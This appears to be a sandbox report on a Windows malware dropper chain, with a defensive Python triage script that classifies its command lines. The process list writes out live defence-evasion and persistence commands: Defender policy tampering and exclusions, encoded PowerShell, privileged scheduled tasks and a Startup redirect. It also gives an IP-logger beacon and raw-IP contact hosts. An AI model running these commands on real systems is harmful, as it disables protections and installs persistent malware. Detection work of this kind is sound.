"C:\Users\Admin\AppData\Local\Temp\wangjinfeng.exe" -h
C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 2032 -ip 2032
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2032 -s 588
C:\Users\Admin\AppData\Local\Temp\tvstream22.exe
"C:\Users\Admin\AppData\Local\Temp\tvstream22.exe"
C:\Users\Admin\AppData\Local\Temp\is-8865F.tmp\setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-8865F.tmp\setup.tmp" /SL5="$601DE,870458,780800,C:\Users\Admin\AppData\Local\Temp\setup.exe"
C:\Users\Admin\AppData\Local\Temp\inst200.exe
"C:\Users\Admin\AppData\Local\Temp\inst200.exe"
C:\Users\Admin\AppData\Local\Temp\jg7_7wjg.exe
"C:\Users\Admin\AppData\Local\Temp\jg7_7wjg.exe"
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 520 -p 5112 -ip 5112
C:\Users\Public\SteamKeyGen.exe
"C:\Users\Public\SteamKeyGen.exe"
C:\Users\Admin\AppData\Local\Temp\udontsay.exe
"C:\Users\Admin\AppData\Local\Temp\udontsay.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 2032 -ip 2032
C:\Users\Admin\AppData\Local\Temp\Routes Installation.exe
"C:\Users\Admin\AppData\Local\Temp\Routes Installation.exe"
C:\Users\Admin\AppData\Local\Temp\anytime1.exe
"C:\Users\Admin\AppData\Local\Temp\anytime1.exe"
C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global
C:\Users\Admin\AppData\Local\Temp\AB6EH.exe
"C:\Users\Admin\AppData\Local\Temp\AB6EH.exe"
C:\Users\Admin\AppData\Local\Temp\anytime3.exe
"C:\Users\Admin\AppData\Local\Temp\anytime3.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 2516 -ip 2516
C:\Users\Admin\AppData\Local\Temp\bearvpn3.exe
"C:\Users\Admin\AppData\Local\Temp\bearvpn3.exe"
C:\Users\Admin\AppData\Local\Temp\9KBMC.exe
"C:\Users\Admin\AppData\Local\Temp\9KBMC.exe"
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
C:\Users\Admin\AppData\Local\Temp\9KBMC67FIDAHIDD.exe
https://iplogger.org/1nXhi7
C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
C:\Users\Admin\AppData\Local\Temp\anytime2.exe
"C:\Users\Admin\AppData\Local\Temp\anytime2.exe"
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global
C:\Users\Admin\AppData\Local\Temp\L3MMH.exe
"C:\Users\Admin\AppData\Local\Temp\L3MMH.exe"
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
C:\Users\Admin\AppData\Local\Temp\9KGGD.exe
"C:\Users\Admin\AppData\Local\Temp\9KGGD.exe"
C:\Users\Admin\AppData\Local\Temp\is-SGREN.tmp\setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-SGREN.tmp\setup.tmp" /SL5="$701BC,870458,780800,C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT
C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gWVLwaCWd" /SC once /ST 03:32:05 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2516 -s 604
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 2032 -ip 2032
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2032 -s 884
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 5112 -s 708
C:\Users\Public\SteamKeyNeg.exe
"C:\Users\Public\SteamKeyNeg.exe"
C:\Users\Admin\AppData\Local\Temp\6AHD0.exe
"C:\Users\Admin\AppData\Local\Temp\6AHD0.exe"
C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2032 -s 1264
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gWVLwaCWd"
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
C:\Users\Admin\AppData\Local\Temp\jg7_7wjg.exe
"C:\Users\Admin\AppData\Local\Temp\jg7_7wjg.exe"
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
C:\Users\Admin\AppData\Local\Temp\lEDcrpdl2pCEl\Application407.exe
C:\Users\Admin\AppData\Local\Temp\lEDcrpdl2pCEl\Application407.exe
C:\Users\Admin\AppData\Local\Temp\is-V54MM.tmp\nthostwins.exe
"C:\Users\Admin\AppData\Local\Temp\is-V54MM.tmp\nthostwins.exe" 81
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpDA4B.tmp.bat""
C:\Windows\SysWOW64\control.exe
"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\ZS~h.CPL",
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\ZS~h.CPL",
C:\Windows\system32\rundll32.exe
C:\Windows\system32\rundll32.exe C:\Windows\system32\PcaSvc.dll,PcaPatchSdbTask
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
C:\Windows\system32\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d "C:\ProgramData\Protection Controller v6.0.5"
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 536 -p 4976 -ip 4976
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4976 -s 2072
C:\Users\Admin\AppData\Local\Temp\Chrome6.exe
"C:\Users\Admin\AppData\Local\Temp\Chrome6.exe"
C:\Users\Admin\AppData\Local\Temp\temp-working.exe
"C:\Users\Admin\AppData\Local\Temp\temp-working.exe"
C:\Users\Admin\AppData\Local\Temp\Chrome6.exe
"C:\Users\Admin\AppData\Local\Temp\Chrome6.exe"
C:\Users\Admin\AppData\Local\Temp\Chrome6.exe
"C:\Users\Admin\AppData\Local\Temp\Chrome6.exe"
C:\Users\Admin\AppData\Local\Temp\bearvpn3.exe
"C:\Users\Admin\AppData\Local\Temp\bearvpn3.exe"
C:\Users\Admin\AppData\Local\Temp\bearvpn3.exe
"C:\Users\Admin\AppData\Local\Temp\bearvpn3.exe"
C:\Users\Admin\AppData\Local\Temp\bearvpn3.exe
"C:\Users\Admin\AppData\Local\Temp\bearvpn3.exe"
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gWVLwaCWd"
C:\Windows\system32\timeout.exe
timeout 4
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bYhnlZZiGBwVWbxfjL" /SC once /ST 06:16:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\NgGwqggyBEjLeKfaL\wxUWNCCtxxWMNyL\yjOthBP.exe\" ZF /site_id 525403 /S" /V1 /F
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 472 -p 3140 -ip 3140
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3140 -s 2232
C:\ProgramData\Protection Controller v6.0.5\3e8f3f1f.exe
"C:\ProgramData\Protection Controller v6.0.5\3e8f3f1f.exe"
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 480 -p 2212 -ip 2212
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2212 -s 2236
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 560 -p 1972 -ip 1972
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 1972 -s 2240
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 472 -p 5588 -ip 5588
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 5588 -s 2284
C:\Users\Admin\AppData\Roaming\Routes\Routes.exe
"C:\Users\Admin\AppData\Roaming\Routes\Routes.exe" "--oVWJq23b"
C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome6.exe"
C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome6.exe"
C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome6.exe"
C:\Windows\System32\cmd.exe
"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
C:\Windows\System32\cmd.exe
"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
C:\Windows\System32\cmd.exe
"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
C:\Windows\System32\cmd.exe
"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
C:\Windows\System32\cmd.exe
"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
C:\Windows\System32\cmd.exe
"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
C:\Users\Admin\AppData\Roaming\Routes\Routes.exe
C:\Users\Admin\AppData\Roaming\Routes\Routes.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Routes\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Routes\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Routes\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Routes\User Data" --annotation=plat=Win64 --annotation=prod=Routes --annotation=ver=0.0.13 --initial-client-data=0x26c,0x270,0x274,0x248,0x278,0x7ffc779fdec0,0x7ffc779fded0,0x7ffc779fdee0
C:\Users\Admin\AppData\Roaming\Routes\Routes.exe
C:\Users\Admin\AppData\Roaming\Routes\Routes.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Routes\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Routes\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Routes --annotation=ver=0.0.13 --initial-client-data=0x144,0x148,0x14c,0x120,0x150,0x7ff6a19c9e70,0x7ff6a19c9e80,0x7ff6a19c9e90
C:\Users\Admin\AppData\Roaming\Routes\Routes.exe
"C:\Users\Admin\AppData\Roaming\Routes\Routes.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1652,15480708616398607635,4250913911406448746,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Routes\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5268_1151382142" --mojo-platform-channel-handle=1864 /prefetch:8
C:\Users\Admin\AppData\Roaming\Routes\Routes.exe
"C:\Users\Admin\AppData\Roaming\Routes\Routes.exe" --type=gpu-process --field-trial-handle=1652,15480708616398607635,4250913911406448746,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Routes\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5268_1151382142" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1660 /prefetch:2
C:\Users\Admin\AppData\Roaming\Routes\Routes.exe
"C:\Users\Admin\AppData\Roaming\Routes\Routes.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1652,15480708616398607635,4250913911406448746,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Routes\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5268_1151382142" --mojo-platform-channel-handle=2192 /prefetch:8
C:\Users\Admin\AppData\Roaming\Routes\Routes.exe
"C:\Users\Admin\AppData\Roaming\Routes\Routes.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Routes\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1652,15480708616398607635,4250913911406448746,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Routes\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5268_1151382142" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2616 /prefetch:1
C:\Users\Admin\AppData\Roaming\Routes\Routes.exe
"C:\Users\Admin\AppData\Roaming\Routes\Routes.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Routes\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1652,15480708616398607635,4250913911406448746,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Routes\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5268_1151382142" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2564 /prefetch:1
C:\Windows\system32\RunDll32.exe
C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\ZS~h.CPL",
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\Admin\AppData\Local\Temp\ZS~h.CPL",
C:\Users\Admin\AppData\Roaming\Routes\Routes.exe
"C:\Users\Admin\AppData\Roaming\Routes\Routes.exe" --type=gpu-process --field-trial-handle=1652,15480708616398607635,4250913911406448746,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Routes\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5268_1151382142" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3196 /prefetch:2
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
C:\Windows\System32\cmd.exe
"cmd" cmd /c "C:\Windows\system32\services64.exe"
C:\Windows\System32\cmd.exe
"cmd" cmd /c "C:\Windows\system32\services64.exe"
C:\Windows\System32\cmd.exe
"cmd" cmd /c "C:\Windows\system32\services64.exe"
C:\Windows\system32\services64.exe
C:\Windows\system32\services64.exe
C:\Windows\system32\services64.exe
C:\Windows\system32\services64.exe
C:\Windows\system32\services64.exe
C:\Windows\system32\services64.exe
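The process list above shows the sample's defence-evasion and persistence steps as raw command lines: Defender policy keys written with `REG ADD`, exclusions added with `Add-MpPreference`, a SYSTEM scheduled task, a `User Shell Folders\Startup` redirect into `C:\ProgramData\Protection Controller v6.0.5`, `.CPL` execution through `Control_RunDLL`, and a Base64 `-EncodedCommand`. The following triage script is an added example and not part of the sandbox report or the sample; it tags such lines by technique, decodes the encoded PowerShell body (UTF-16LE, as PowerShell expects), and pulls the task name, run-as account and target binary out of `schtasks /create`. The rule names, helper names and the `SAMPLE_CMDLINES` list are this example's own constructions; the sample entries are copied from the command lines listed above, plus one benign `rundll32` line as a negative control.

```python
"""Added triage helper: tags sandbox process command lines by technique."""
import base64
import re
from typing import Dict, List, Optional, Set

# Rule names are labels chosen for this example, not sandbox signature names.
_RULES = {
    "defender-policy-tamper": re.compile(
        r'REG\s+ADD\s+"?HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender', re.I),
    "defender-exclusion-added": re.compile(r"Add-MpPreference\s+-Exclusion(?:Path|Extension)", re.I),
    "scheduled-task-create": re.compile(r"schtasks(?:\.exe)?\s+/create", re.I),
    "scheduled-task-run": re.compile(r"schtasks(?:\.exe)?\s+/run", re.I),
    "startup-folder-redirect": re.compile(r'User Shell Folders"?\s+/f\s+/v\s+Startup', re.I),
    "process-kill": re.compile(r"taskkill\s+/f\s+/im\s+\S+", re.I),
    "cpl-via-control-rundll": re.compile(r'Control_RunDLL|shell32\.dll"?,#44|\.cpl\b', re.I),
    "encoded-powershell": re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "group-policy-refresh": re.compile(r"gpupdate(?:\.exe)?\s+/force", re.I),
}
_ENC = re.compile(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})", re.I)
_TN = re.compile(r'/tn\s+"?([^"\s]+)', re.I)
_RU = re.compile(r'/ru\s+"?([^"\s]+)', re.I)
_SC = re.compile(r"/sc\s+(\S+)", re.I)
_RL = re.compile(r"/rl\s+(\S+)", re.I)
# /tr value: a quoted string that may itself contain \" escapes, or a bare token.
_TR = re.compile(r'/tr\s+("(?:\\.|[^"\\])*"|\S+)', re.I)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the plaintext of a PowerShell -EncodedCommand (Base64 of UTF-16LE), or None."""
    m = _ENC.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def classify(cmdline: str) -> Set[str]:
    """Tag a command line; the rules are also run over the decoded PowerShell body."""
    texts = [cmdline]
    decoded = decode_encoded_command(cmdline)
    if decoded:
        texts.append(decoded)
    return {name for name, rx in _RULES.items() if any(rx.search(t) for t in texts)}


def _first_token(action: str) -> str:
    """Executable path of a task action: the quoted first token or the first word."""
    action = action.strip()
    if action.startswith('"'):
        end = action.find('"', 1)
        return action[1:end] if end > 0 else action[1:]
    return action.split(" ", 1)[0]


def parse_schtasks(cmdline: str) -> Optional[Dict[str, object]]:
    """Extract name, schedule, run-as, run level and target binary from schtasks /create."""
    if not _RULES["scheduled-task-create"].search(cmdline):
        return None
    info: Dict[str, object] = {}
    for key, rx in (("name", _TN), ("run_as", _RU), ("schedule", _SC), ("run_level", _RL)):
        m = rx.search(cmdline)
        if m:
            info[key] = m.group(1)
    m = _TR.search(cmdline)
    if m:
        action = m.group(1)
        if action.startswith('"'):  # strip outer quotes, unescape \" inside
            action = action[1:-1].replace('\\"', '"')
        info["action"] = action
        info["binary"] = _first_token(action)
    run_as, run_level = str(info.get("run_as", "")), str(info.get("run_level", ""))
    info["privileged"] = run_as.upper() == "SYSTEM" or run_level.upper() == "HIGHEST"
    return info


def triage(cmdlines: List[str]) -> List[Dict[str, object]]:
    """Return one finding per command line that trips at least one rule."""
    findings: List[Dict[str, object]] = []
    for line in cmdlines:
        tags = classify(line)
        if not tags:
            continue
        entry: Dict[str, object] = {"cmdline": line, "tags": sorted(tags)}
        decoded = decode_encoded_command(line)
        if decoded:
            entry["decoded"] = decoded
        task = parse_schtasks(line)
        if task:
            entry["task"] = task
        findings.append(entry)
    return findings


# Constructed input: command lines copied from the process list of this detonation.
SAMPLE_CMDLINES = [
    r'REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32',
    r'REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64',
    r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==',
    r'schtasks /run /I /tn "gWVLwaCWd"',
    r'cmd.exe /c taskkill /f /im chrome.exe',
    r'REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d "C:\ProgramData\Protection Controller v6.0.5"',
    r'"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\ZS~h.CPL",',
    r'schtasks /CREATE /TN "bYhnlZZiGBwVWbxfjL" /SC once /ST 06:16:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\NgGwqggyBEjLeKfaL\wxUWNCCtxxWMNyL\yjOthBP.exe\" ZF /site_id 525403 /S" /V1 /F',
    r'''"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit''',
    r'schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"',
    r'C:\Windows\system32\rundll32.exe C:\Windows\system32\PcaSvc.dll,PcaPatchSdbTask',  # benign control
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_CMDLINES):
        print(finding["tags"], "<-", str(finding["cmdline"])[:90])
        for key in ("decoded", "task"):
            if key in finding:
                print("   ", key, "=", finding[key])
```

The encoded command on this page decodes to `start-process -WindowStyle Hidden gpupdate.exe /force`, which is what makes the `HKLM\SOFTWARE\Policies\Microsoft\Windows Defender` keys written just before it take effect immediately: policy values under that hive are only applied on a Group Policy refresh, so a detection that fires on the `REG ADD` alone would miss the step that actually disables reporting. The decoded text is run through the same rules as the outer command line, so that `gpupdate /force` is tagged even though it never appears in clear text. Exclusion-path and task-target strings are kept verbatim in the findings because they are the most useful pivots (`C:\ProgramData\Protection Controller v6.0.5`, `services64.exe` under `System32`) for hunting the same family on other hosts.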
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | licensing.mp.microsoft.com | udp |
| US | 20.223.25.224:443 | licensing.mp.microsoft.com | tcp |
| US | 8.8.8.8:53 | storesdk.dsx.mp.microsoft.com | udp |
| FR | 2.18.109.224:443 | storesdk.dsx.mp.microsoft.com | tcp |
| US | 8.8.8.8:53 | telegram.org | udp |
| NL | 149.154.167.99:443 | telegram.org | tcp |
| US | 20.223.25.224:443 | licensing.mp.microsoft.com | tcp |
| NL | 212.193.30.45:80 | 212.193.30.45 | tcp |
| NL | 212.193.30.21:80 | 212.193.30.21 | tcp |
| US | 20.223.25.224:443 | licensing.mp.microsoft.com | tcp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.59.81:443 | ipinfo.io | tcp |
| US | 20.223.25.224:443 | licensing.mp.microsoft.com | tcp |
| NL | 45.144.225.57:80 | 45.144.225.57 | tcp |
| NL | 212.193.30.45:80 | 212.193.30.45 | tcp |
| NL | 212.193.30.21:80 | 212.193.30.21 | tcp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
